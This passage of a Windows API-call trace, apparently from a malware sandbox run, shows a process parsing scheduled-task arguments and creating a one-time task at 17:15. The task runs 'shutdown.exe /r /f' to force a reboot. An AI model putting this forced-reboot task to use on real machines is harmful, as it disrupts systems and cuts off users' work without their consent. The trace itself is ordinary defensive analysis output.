\x09", wMatch=0x79) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x33) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x32) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0038.859] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0038.859] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0038.859] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0038.859] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0038.859] StrChrW (lpStart=" \x09", wMatch=0x2f) returned 0x0 [0038.859] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0038.859] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0038.859] StrChrW (lpStart=" \x09", wMatch=0x2f) returned 0x0 [0038.859] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0038.859] GetLastError () returned 0x0 [0038.859] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.859] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.859] SetLastError (dwErrCode=0x0) [0038.859] SetLastError (dwErrCode=0x0) [0038.859] lstrlenW (lpString="/ST") returned 3 [0038.859] lstrlenW (lpString="-/") returned 2 [0038.859] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.859] lstrlenW (lpString="create") returned 6 [0038.859] lstrlenW (lpString="create") returned 6 [0038.859] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.859] lstrlenW (lpString="ST") returned 2 [0038.860] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.860] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|create|") returned 8 [0038.860] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.860] lstrlenW (lpString="|create|") returned 8 [0038.860] lstrlenW (lpString="|ST|") returned 4 [0038.860] StrStrIW (lpFirst="|create|", lpSrch="|ST|") returned 0x0 [0038.860] SetLastError (dwErrCode=0x490) [0038.860] lstrlenW (lpString="?") returned 1 [0038.860] lstrlenW (lpString="?") returned 1 [0038.860] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.860] lstrlenW (lpString="ST") returned 2 [0038.860] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.860] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|?|") returned 3 [0038.860] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.860] lstrlenW (lpString="|?|") returned 3 [0038.860] lstrlenW (lpString="|ST|") returned 4 [0038.860] SetLastError (dwErrCode=0x490) [0038.860] lstrlenW (lpString="s") returned 1 [0038.860] lstrlenW (lpString="s") returned 1 [0038.860] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.861] lstrlenW (lpString="ST") returned 2 [0038.861] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.861] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|s|") returned 3 [0038.861] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.861] lstrlenW (lpString="|s|") returned 3 [0038.861] lstrlenW (lpString="|ST|") returned 4 [0038.861] SetLastError (dwErrCode=0x490) [0038.861] lstrlenW (lpString="u") returned 1 [0038.861] lstrlenW (lpString="u") returned 1 [0038.861] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.861] lstrlenW (lpString="ST") returned 2 [0038.861] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.861] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|u|") returned 3 [0038.861] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.861] lstrlenW (lpString="|u|") returned 3 [0038.861] lstrlenW (lpString="|ST|") returned 4 [0038.861] SetLastError (dwErrCode=0x490) [0038.861] lstrlenW (lpString="p") returned 1 [0038.861] lstrlenW (lpString="p") returned 1 [0038.861] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.862] lstrlenW (lpString="ST") returned 2 [0038.862] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.862] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|p|") returned 3 [0038.862] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.862] lstrlenW (lpString="|p|") returned 3 [0038.862] lstrlenW (lpString="|ST|") returned 4 [0038.862] SetLastError (dwErrCode=0x490) [0038.862] lstrlenW (lpString="ru") returned 2 [0038.862] lstrlenW (lpString="ru") returned 2 [0038.862] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.862] lstrlenW (lpString="ST") returned 2 [0038.862] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.862] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ru|") returned 4 [0038.862] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.862] lstrlenW (lpString="|ru|") returned 4 [0038.862] lstrlenW (lpString="|ST|") returned 4 [0038.862] StrStrIW (lpFirst="|ru|", lpSrch="|ST|") returned 0x0 [0038.862] SetLastError (dwErrCode=0x490) [0038.862] lstrlenW (lpString="rp") returned 2 [0038.862] lstrlenW (lpString="rp") returned 2 [0038.862] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.863] lstrlenW (lpString="ST") returned 2 [0038.863] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.863] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|rp|") returned 4 [0038.863] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.863] lstrlenW (lpString="|rp|") returned 4 [0038.863] lstrlenW (lpString="|ST|") returned 4 [0038.863] StrStrIW (lpFirst="|rp|", lpSrch="|ST|") returned 0x0 [0038.863] SetLastError (dwErrCode=0x490) [0038.863] lstrlenW (lpString="sc") returned 2 [0038.863] lstrlenW (lpString="sc") returned 2 [0038.863] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.863] lstrlenW (lpString="ST") returned 2 [0038.863] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.863] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|sc|") returned 4 [0038.863] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.863] lstrlenW (lpString="|sc|") returned 4 [0038.863] lstrlenW (lpString="|ST|") returned 4 [0038.863] StrStrIW (lpFirst="|sc|", lpSrch="|ST|") returned 0x0 [0038.863] SetLastError (dwErrCode=0x490) [0038.864] lstrlenW (lpString="mo") returned 2 [0038.864] lstrlenW (lpString="mo") returned 2 [0038.864] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.864] lstrlenW (lpString="ST") returned 2 [0038.864] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.864] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|mo|") returned 4 [0038.864] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.864] lstrlenW (lpString="|mo|") returned 4 [0038.864] lstrlenW (lpString="|ST|") returned 4 [0038.864] StrStrIW (lpFirst="|mo|", lpSrch="|ST|") returned 0x0 [0038.864] SetLastError (dwErrCode=0x490) [0038.864] lstrlenW (lpString="d") returned 1 [0038.864] lstrlenW (lpString="d") returned 1 [0038.864] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.864] lstrlenW (lpString="ST") returned 2 [0038.864] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.864] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|d|") returned 3 [0038.864] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.864] lstrlenW (lpString="|d|") returned 3 [0038.864] lstrlenW (lpString="|ST|") returned 4 [0038.865] SetLastError (dwErrCode=0x490) [0038.865] lstrlenW (lpString="m") returned 1 [0038.865] lstrlenW (lpString="m") returned 1 [0038.865] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.865] lstrlenW (lpString="ST") returned 2 [0038.865] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.865] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|m|") returned 3 [0038.865] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.865] lstrlenW (lpString="|m|") returned 3 [0038.865] lstrlenW (lpString="|ST|") returned 4 [0038.865] SetLastError (dwErrCode=0x490) [0038.865] lstrlenW (lpString="i") returned 1 [0038.865] lstrlenW (lpString="i") returned 1 [0038.865] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.865] lstrlenW (lpString="ST") returned 2 [0038.865] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.865] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|i|") returned 3 [0038.865] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.865] lstrlenW (lpString="|i|") returned 3 [0038.865] lstrlenW (lpString="|ST|") returned 4 [0038.866] SetLastError (dwErrCode=0x490) [0038.866] lstrlenW (lpString="tn") returned 2 [0038.866] lstrlenW (lpString="tn") returned 2 [0038.866] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.866] lstrlenW (lpString="ST") returned 2 [0038.866] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.866] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|tn|") returned 4 [0038.866] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.866] lstrlenW (lpString="|tn|") returned 4 [0038.866] lstrlenW (lpString="|ST|") returned 4 [0038.866] StrStrIW (lpFirst="|tn|", lpSrch="|ST|") returned 0x0 [0038.866] SetLastError (dwErrCode=0x490) [0038.866] lstrlenW (lpString="tr") returned 2 [0038.866] lstrlenW (lpString="tr") returned 2 [0038.866] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.866] lstrlenW (lpString="ST") returned 2 [0038.866] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.866] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|tr|") returned 4 [0038.866] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.866] lstrlenW (lpString="|tr|") returned 4 [0038.867] lstrlenW (lpString="|ST|") returned 4 [0038.867] StrStrIW (lpFirst="|tr|", lpSrch="|ST|") returned 0x0 [0038.867] SetLastError (dwErrCode=0x490) [0038.867] lstrlenW (lpString="st") returned 2 [0038.867] lstrlenW (lpString="st") returned 2 [0038.867] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.867] lstrlenW (lpString="ST") returned 2 [0038.867] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.867] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|st|") returned 4 [0038.867] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ST|") returned 4 [0038.867] lstrlenW (lpString="|st|") returned 4 [0038.867] lstrlenW (lpString="|ST|") returned 4 [0038.867] StrStrIW (lpFirst="|st|", lpSrch="|ST|") returned="|st|" [0038.867] SetLastError (dwErrCode=0x0) [0038.867] SetLastError (dwErrCode=0x0) [0038.867] lstrlenW (lpString="17:15") returned 5 [0038.868] lstrlenW (lpString="-/") returned 2 [0038.868] StrChrIW (lpStart="-/", wMatch=0x31) returned 0x0 [0038.868] SetLastError (dwErrCode=0x490) [0038.868] SetLastError (dwErrCode=0x490) [0038.868] SetLastError (dwErrCode=0x0) [0038.868] lstrlenW (lpString="17:15") returned 5 [0038.868] StrChrIW (lpStart="17:15", wMatch=0x3a) returned=":15" [0038.868] lstrlenW (lpString="17:15") returned 5 [0038.868] _memicmp (_Buf1=0x5a4c30, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.868] _memicmp (_Buf1=0x5a4c60, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.868] SetLastError (dwErrCode=0x7a) [0038.868] SetLastError (dwErrCode=0x0) [0038.868] SetLastError (dwErrCode=0x0) [0038.868] lstrlenW (lpString="17") returned 2 [0038.868] lstrlenW (lpString="-/") returned 2 [0038.868] StrChrIW (lpStart="-/", wMatch=0x31) returned 0x0 [0038.868] SetLastError (dwErrCode=0x490) [0038.868] SetLastError (dwErrCode=0x490) [0038.868] SetLastError (dwErrCode=0x0) [0038.868] _memicmp (_Buf1=0x5a4c48, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.868] lstrlenW (lpString="17:15") returned 5 [0038.868] lstrlenW (lpString="17:15") returned 5 [0038.868] lstrlenW (lpString=" \x09") returned 2 [0038.869] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0038.869] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0038.869] StrChrW (lpStart=" \x09", wMatch=0x37) returned 0x0 [0038.869] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0038.869] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0038.869] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0038.869] GetLastError () returned 0x0 [0038.869] lstrlenW (lpString="17:15") returned 5 [0038.869] lstrlenW (lpString="17:15") returned 5 [0038.869] SetLastError (dwErrCode=0x0) [0038.869] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.869] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0038.869] lstrlenW (lpString="MINUTE") returned 6 [0038.869] GetThreadLocale () returned 0x409 [0038.869] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="once", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 3 [0038.870] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.870] LoadStringW (in: hInstance=0x0, uID=0x1af, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="HOURLY") returned 0x6 [0038.870] lstrlenW (lpString="HOURLY") returned 6 [0038.870] GetThreadLocale () returned 0x409 [0038.870] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="once", cchCount1=-1, lpString2="HOURLY", cchCount2=-1) returned 3 [0038.870] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.870] LoadStringW (in: hInstance=0x0, uID=0x1b0, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="DAILY") returned 0x5 [0038.870] lstrlenW (lpString="DAILY") returned 5 [0038.870] GetThreadLocale () returned 0x409 [0038.870] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="once", cchCount1=-1, lpString2="DAILY", cchCount2=-1) returned 3 [0038.870] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.870] LoadStringW (in: hInstance=0x0, uID=0x1b1, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="WEEKLY") returned 0x6 [0038.870] lstrlenW (lpString="WEEKLY") returned 6 [0038.870] GetThreadLocale () returned 0x409 [0038.870] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="once", cchCount1=-1, lpString2="WEEKLY", cchCount2=-1) returned 1 [0038.871] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.871] LoadStringW (in: hInstance=0x0, uID=0x1b2, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="MONTHLY") returned 0x7 [0038.871] lstrlenW (lpString="MONTHLY") returned 7 [0038.871] GetThreadLocale () returned 0x409 [0038.871] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="once", cchCount1=-1, lpString2="MONTHLY", cchCount2=-1) returned 3 [0038.871] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.871] LoadStringW (in: hInstance=0x0, uID=0x1b3, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="ONCE") returned 0x4 [0038.871] lstrlenW (lpString="ONCE") returned 4 [0038.871] GetThreadLocale () returned 0x409 [0038.871] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="once", cchCount1=-1, lpString2="ONCE", cchCount2=-1) returned 2 [0038.871] SetLastError (dwErrCode=0x0) [0038.871] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.872] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0038.872] lstrlenW (lpString="First") returned 5 [0038.872] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.872] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0038.872] lstrlenW (lpString="Second") returned 6 [0038.872] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.872] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0038.872] lstrlenW (lpString="Third") returned 5 [0038.872] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.872] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0038.872] lstrlenW (lpString="Fourth") returned 6 [0038.872] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.872] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0038.872] lstrlenW (lpString="Last") returned 4 [0038.872] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.873] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0038.873] lstrlenW (lpString="First") returned 5 [0038.873] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.873] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0038.873] lstrlenW (lpString="Second") returned 6 [0038.873] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.873] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0038.873] lstrlenW (lpString="Third") returned 5 [0038.873] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.873] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0038.873] lstrlenW (lpString="Fourth") returned 6 [0038.873] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.873] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0038.873] lstrlenW (lpString="Last") returned 4 [0038.874] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x18ca90, cchData=128 | out: lpLCData="0") returned 2 [0038.874] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.874] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0038.874] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0038.874] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x18ca98, cchData=128 | out: lpLCData="0") returned 2 [0038.874] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.874] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0038.874] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0038.875] GetLocalTime (in: lpSystemTime=0x18cc48 | out: lpSystemTime=0x18cc48*(wYear=0x7e1, wMonth=0x6, wDayOfWeek=0x5, wDay=0x1e, wHour=0x11, wMinute=0x2, wSecond=0xc, wMilliseconds=0x133)) [0038.875] lstrlenW (lpString="17:15") returned 5 [0038.875] lstrlenW (lpString="17:15") returned 5 [0038.875] _wtoi (_String="17:15") returned 17 [0038.875] _wtoi (_String="15") returned 15 [0038.875] _wtoi (_String="") returned 0 [0038.875] lstrlenW (lpString="") returned 0 [0038.875] GetLocalTime (in: lpSystemTime=0x18d064 | out: lpSystemTime=0x18d064*(wYear=0x7e1, wMonth=0x6, wDayOfWeek=0x5, wDay=0x1e, wHour=0x11, wMinute=0x2, wSecond=0xc, wMilliseconds=0x133)) [0038.875] lstrlenW (lpString="") returned 0 [0038.875] lstrlenW (lpString="17:15") returned 5 [0038.875] lstrlenW (lpString="17:15") returned 5 [0038.875] _wtoi (_String="17:15") returned 17 [0038.875] _wtoi (_String="15") returned 15 [0038.876] _wtoi (_String="") returned 0 [0038.876] lstrlenW (lpString="") returned 0 [0038.876] lstrlenW (lpString="") returned 0 [0038.876] lstrlenW (lpString="") returned 0 [0038.876] lstrlenW (lpString="") returned 0 [0038.876] lstrlenW (lpString="") returned 0 [0038.876] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0038.922] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0039.054] CoCreateInstance (in: rclsid=0x7b230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7b20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d01c | out: ppv=0x18d01c*=0x2c3d18) returned 0x0 [0039.248] TaskScheduler:ITaskService:Connect (This=0x2c3d18, serverName=0x18cf8c*(varType=0x8, wReserved1=0x7694, wReserved2=0x630, wReserved3=0x769e, varVal1=0x0, varVal2=0x0), user=0x18cf9c*(varType=0x0, wReserved1=0x76b2, wReserved2=0x8479, wReserved3=0xd2b4, varVal1=0x18eaf8, varVal2=0x18df08), domain=0x18cfac*(varType=0x0, wReserved1=0xd36f, wReserved2=0xded0, wReserved3=0x18, varVal1=0x7b994e, varVal2=0x18f4f4), password=0x18cfbc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x18d010)) returned 0x0 [0039.258] TaskScheduler:IUnknown:AddRef (This=0x2c3d18) returned 0x2 [0039.258] TaskScheduler:ITaskService:GetFolder (in: This=0x2c3d18, Path=0x0, ppFolder=0x18d0c0 | out: ppFolder=0x18d0c0*=0x2c3d80) returned 0x0 [0039.260] TaskScheduler:ITaskService:NewTask (in: This=0x2c3d18, flags=0x0, ppDefinition=0x18d0d0 | out: ppDefinition=0x18d0d0*=0x2c3de0) returned 0x0 [0039.263] ITaskDefinition:get_Actions (in: This=0x2c3de0, ppActions=0x18d01c | out: ppActions=0x18d01c*=0x2c3e58) returned 0x0 [0039.263] IActionCollection:Create (in: This=0x2c3e58, Type=0, ppAction=0x18d034 | out: ppAction=0x18d034*=0x2c2580) returned 0x0 [0039.264] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0039.264] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0039.264] lstrlenW (lpString=" ") returned 1 [0039.264] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0039.264] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0039.264] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0039.264] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0039.264] StrChrW (lpStart=" ", wMatch=0x57) returned 0x0 [0039.264] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0039.264] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x77) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0039.265] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0039.265] StrChrW 